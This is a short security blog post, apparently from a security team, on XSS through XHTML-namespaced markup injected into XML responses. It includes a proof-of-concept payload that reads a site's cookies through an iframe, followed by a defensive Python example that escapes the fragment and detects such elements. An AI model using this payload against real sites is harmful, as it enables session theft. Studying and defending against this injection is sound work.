My colleague John Hernandez showed me this trick the other day, which has proven useful as an exploit in many cases. If the site returns XML with a Content-Type: text/xml you’d normally think there’s not much script injection potential. However there most certainly is if an attacker can control just one fragment of the XML.
    <?xml version="1.0" encoding="UTF-8" ?>
    <root>
      <a> (attacker controlled) </a>
    </root>

If the attacker can control the XML fragment in that part, they could insert something like:

    <p xmlns='http://www.w3.org/1999/xhtml'>
      <script>
        function myfunction() {
          var doc = window.frames["myFrame"].document;
          alert(doc.cookie);
        }
      </script>
      <form>
        <input type="button" onclick="myfunction()" value="Call function" />
      </form>
      <iframe src="site domain" id="myFrame" />
    </p>

By specifying an XML namespace (xmlns) of XHTML, some browsers (Firefox only afaik) will treat the data as HTML and render it in the domain hosting it. You use the iframe to point back to the domain and use its DOM to access the session information, which isn't available in the original XML DOM. I believe this is desired functionality in Firefox, but we've found several exploitable issues in popular applications because of it.

[Ph4nt0m] <http://www.ph4nt0m.org/> [Ph4nt0m Security Team] <http://blog.ph4nt0m.org/>
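The defensive counterpart to the post above, as an added example (not code from the original message): the user-controlled fragment is escaped before being placed into the `<a>` element, and a check parses the served XML and flags any element that ends up in the XHTML namespace. The payload and the `example.com` iframe target are constructed sample values.

```python
"""Detect XHTML-namespaced elements smuggled into an XML response, and show
the escaping that prevents it. Example code, not from the original post."""
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape

XHTML_NS = "http://www.w3.org/1999/xhtml"

# Constructed sample payload in the shape described in the post: an XHTML
# <p> carrying a script and an iframe, injected into the <a> element.
PAYLOAD = (
    "<p xmlns='http://www.w3.org/1999/xhtml'>"
    "<script>myfunction()</script>"
    "<iframe src='https://example.com/' id='myFrame' />"
    "</p>"
)


def build_response(fragment: str, escape_fragment: bool) -> bytes:
    """Embed a fragment in <a>, either raw (unsafe) or XML-escaped (safe).

    xml.sax.saxutils.escape turns '<', '>' and '&' into entities, so an
    injected <p xmlns=...> becomes character data instead of markup.
    """
    body = escape(fragment) if escape_fragment else fragment
    doc = f"<?xml version='1.0' encoding='UTF-8'?><root><a>{body}</a></root>"
    return doc.encode("utf-8")


def xhtml_elements(xml_bytes: bytes) -> list:
    """Return local names of every element in the XHTML namespace.

    ElementTree exposes a namespaced tag as '{uri}localname', so any
    element whose tag starts with '{http://www.w3.org/1999/xhtml}' is one
    a browser may decide to render as HTML.
    """
    root = ET.fromstring(xml_bytes)
    prefix = "{" + XHTML_NS + "}"
    return [el.tag[len(prefix):] for el in root.iter()
            if el.tag.startswith(prefix)]


def is_suspicious(xml_bytes: bytes) -> bool:
    """True if the response contains any XHTML-namespaced element."""
    return bool(xhtml_elements(xml_bytes))


if __name__ == "__main__":
    print("raw:    ", xhtml_elements(build_response(PAYLOAD, False)))
    print("escaped:", xhtml_elements(build_response(PAYLOAD, True)))
```

The check is a response-side detector: run it over XML your application serves, and treat any XHTML element in a document that is not supposed to carry markup as an injection.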